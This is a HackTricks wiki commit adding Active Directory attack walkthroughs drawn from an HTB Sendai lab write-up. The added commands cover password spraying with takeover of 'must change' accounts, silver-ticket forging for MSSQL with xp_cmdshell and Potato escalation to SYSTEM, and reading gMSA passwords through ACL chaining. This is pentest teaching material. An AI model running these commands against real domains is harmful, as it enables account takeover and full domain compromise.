Merge pull request #1363 from HackTricks-wiki/update_HTB_Sendai__From_password_spray_to_gMSA_dump__then_20250828_183418

HTB Sendai From password spray to gMSA dump, then ADCS ESC4 ...
2025-10-10 18:36:50 +00:00 · 2025-09-03 18:02:50 +02:00 · 2025-09-03 18:02:50 +02:00 · 690fa390cc
commit 690fa390cc
parent 40dce1cd7d 520e7ee968
4 changed files with 125 additions and 7 deletions
--- a/src/windows-hardening/active-directory-methodology/kerberos-authentication.md
+++ b/src/windows-hardening/active-directory-methodology/kerberos-authentication.md
@ -5,6 +5,3 @@
 **Check the amazing post from:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)
 {{#include ../../banners/hacktricks-training.md}}
--- a/src/windows-hardening/active-directory-methodology/password-spraying.md
+++ b/src/windows-hardening/active-directory-methodology/password-spraying.md
@ -103,6 +103,44 @@ Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
 Invoke-SprayEmptyPassword
 ```
 ### Identify and Take Over "Password must change at next logon" Accounts (SAMR)
 A low-noise technique is to spray a benign/empty password and catch accounts returning STATUS_PASSWORD_MUST_CHANGE, which indicates the password was forcibly expired and can be changed without knowing the old one.
 Workflow:
 - Enumerate users (RID brute via SAMR) to build the target list:
 {{#ref}}
 ../../network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
 {{#endref}}
 ```bash
 # NetExec (null/guest) + RID brute to harvest users
 netexec smb <dc_fqdn> -u '' -p '' --rid-brute | awk -F'\\\\| ' '/SidTypeUser/ {print $3}' > users.txt
 ```
 - Spray an empty password and keep going on hits to capture accounts that must change at next logon:
 ```bash
 # Will show valid, lockout, and STATUS_PASSWORD_MUST_CHANGE among results
 netexec smb <DC.FQDN> -u users.txt -p '' --continue-on-success
 ```
 - For each hit, change the password over SAMR with NetExec’s module (no old password needed when "must change" is set):
 ```bash
 # Strong complexity to satisfy policy
 env NEWPASS='P@ssw0rd!2025#' ; \
 netexec smb <DC.FQDN> -u <User> -p '' -M change-password -o NEWPASS="$NEWPASS"
 # Validate and retrieve domain password policy with the new creds
 netexec smb <DC.FQDN> -u <User> -p "$NEWPASS" --pass-pol
 ```
 Operational notes:
 - Ensure your host clock is in sync with the DC before Kerberos-based operations: `sudo ntpdate <dc_fqdn>`.
 - A [+] without (Pwn3d!) in some modules (e.g., RDP/WinRM) means the creds are valid but the account lacks interactive logon rights.
 ## Brute Force
 ```bash
@ -226,6 +264,7 @@ To use any of these tools, you need a user list and a password / a small list of
 - [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
 - [www.blackhillsinfosec.com/?p=5296](https://www.blackhillsinfosec.com/?p=5296)
 - [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying)
 - [HTB Sendai – 0xdf: from spray to gMSA to DA/SYSTEM](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
--- a/src/windows-hardening/active-directory-methodology/silver-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/silver-ticket.md
@ -43,6 +43,42 @@ mimikatz.exe "kerberos::ptt <TICKET_FILE>"
 The CIFS service is highlighted as a common target for accessing the victim's file system, but other services like HOST and RPCSS can also be exploited for tasks and WMI queries.
 ### Example: MSSQL service (MSSQLSvc) + Potato to SYSTEM
 If you have the NTLM hash (or AES key) of a SQL service account (e.g., sqlsvc) you can forge a TGS for the MSSQL SPN and impersonate any user to the SQL service. From there, enable xp_cmdshell to execute commands as the SQL service account. If that token has SeImpersonatePrivilege, chain a Potato to elevate to SYSTEM.
 ```bash
 # Forge a silver ticket for MSSQLSvc (RC4/NTLM example)
 python ticketer.py -nthash <SQLSVC_RC4> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
  -spn MSSQLSvc/<host.fqdn>:1433 administrator
 export KRB5CCNAME=$PWD/administrator.ccache
 # Connect to SQL using Kerberos and run commands via xp_cmdshell
 impacket-mssqlclient -k -no-pass <DOMAIN>/administrator@<host.fqdn>:1433 \
  -q "EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'whoami'"
 ```
 - If the resulting context has SeImpersonatePrivilege (often true for service accounts), use a Potato variant to get SYSTEM:
 ```bash
 # On the target host (via xp_cmdshell or interactive), run e.g. PrintSpoofer/GodPotato
 PrintSpoofer.exe -c "cmd /c whoami"
 # or
 GodPotato -cmd "cmd /c whoami"
 ```
 More details on abusing MSSQL and enabling xp_cmdshell:
 {{#ref}}
 abusing-ad-mssql.md
 {{#endref}}
 Potato techniques overview:
 {{#ref}}
 ../windows-local-privilege-escalation/roguepotato-and-printspoofer.md
 {{#endref}}
 ## Available Services
 | Service Type                               | Service Silver Tickets                                                     |
@ -167,9 +203,8 @@ dcsync.md
 - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets)
 - [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
 - [https://techcommunity.microsoft.com/blog/askds/machine-account-password-process/396027](https://techcommunity.microsoft.com/blog/askds/machine-account-password-process/396027)
 - [HTB Sendai – 0xdf: Silver Ticket + Potato path](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
--- a/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
@ -169,6 +169,47 @@ You can read this password with [**GMSAPasswordReader**](https://github.com/rvaz
 Also, check this [web page](https://cube0x0.github.io/Relaying-for-gMSA/) about how to perform a **NTLM relay attack** to **read** the **password** of **gMSA**.
 ### Abusing ACL chaining to read gMSA managed password (GenericAll -> ReadGMSAPassword)
 In many environments, low-privileged users can pivot to gMSA secrets without DC compromise by abusing misconfigured object ACLs:
 - A group you can control (e.g., via GenericAll/GenericWrite) is granted `ReadGMSAPassword` over a gMSA.
 - By adding yourself to that group, you inherit the right to read the gMSA’s `msDS-ManagedPassword` blob over LDAP and derive usable NTLM credentials.
 Typical workflow:
 1) Discover the path with BloodHound and mark your foothold principals as Owned. Look for edges like:
   - GroupA GenericAll -> GroupB; GroupB ReadGMSAPassword -> gMSA
 2) Add yourself to the intermediate group you control (example with bloodyAD):
 ```bash
 bloodyAD --host <DC.FQDN> -d <domain> -u <user> -p <pass> add groupMember <GroupWithReadGmsa> <user>
 ```
 3) Read the gMSA managed password via LDAP and derive the NTLM hash. NetExec automates the extraction of `msDS-ManagedPassword` and conversion to NTLM:
 ```bash
 # Shows PrincipalsAllowedToReadPassword and computes NTLM automatically
 netexec ldap <DC.FQDN> -u <user> -p <pass> --gmsa
 # Account: mgtsvc$  NTLM: edac7f05cded0b410232b7466ec47d6f
 ```
 4) Authenticate as the gMSA using the NTLM hash (no plaintext needed). If the account is in Remote Management Users, WinRM will work directly:
 ```bash
 # SMB / WinRM as the gMSA using the NT hash
 netexec smb   <DC.FQDN> -u 'mgtsvc$' -H <NTLM>
 netexec winrm <DC.FQDN> -u 'mgtsvc$' -H <NTLM>
 ```
 Notes:
 - LDAP reads of `msDS-ManagedPassword` require sealing (e.g., LDAPS/sign+seal). Tools handle this automatically.
 - gMSAs are often granted local rights like WinRM; validate group membership (e.g., Remote Management Users) to plan lateral movement.
 - If you only need the blob to compute the NTLM yourself, see MSDS-MANAGEDPASSWORD_BLOB structure.
 ## LAPS
 The **Local Administrator Password Solution (LAPS)**, available for download from [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899), enables the management of local Administrator passwords. These passwords, which are **randomized**, unique, and **regularly changed**, are stored centrally in Active Directory. Access to these passwords is restricted through ACLs to authorized users. With sufficient permissions granted, the ability to read local admin passwords is provided.
@ -269,4 +310,10 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha
 uac-user-account-control.md
 {{#endref}}
 ## References
 - [Relaying for gMSA – cube0x0](https://cube0x0.github.io/Relaying-for-gMSA/)
 - [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader)
 - [HTB Sendai – 0xdf: gMSA via rights chaining to WinRM](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)
 {{#include ../../banners/hacktricks-training.md}}
`@ -5,6 +5,3 @@`
	`Check the amazing post from: [https://www.tarlogic.com/en/blog/how-kerberos-works/](https://www.tarlogic.com/en/blog/how-kerberos-works/)`	`Check the amazing post from: [https://www.tarlogic.com/en/blog/how-kerberos-works/](https://www.tarlogic.com/en/blog/how-kerberos-works/)`

	`{{#include ../../banners/hacktricks-training.md}}`	`{{#include ../../banners/hacktricks-training.md}}`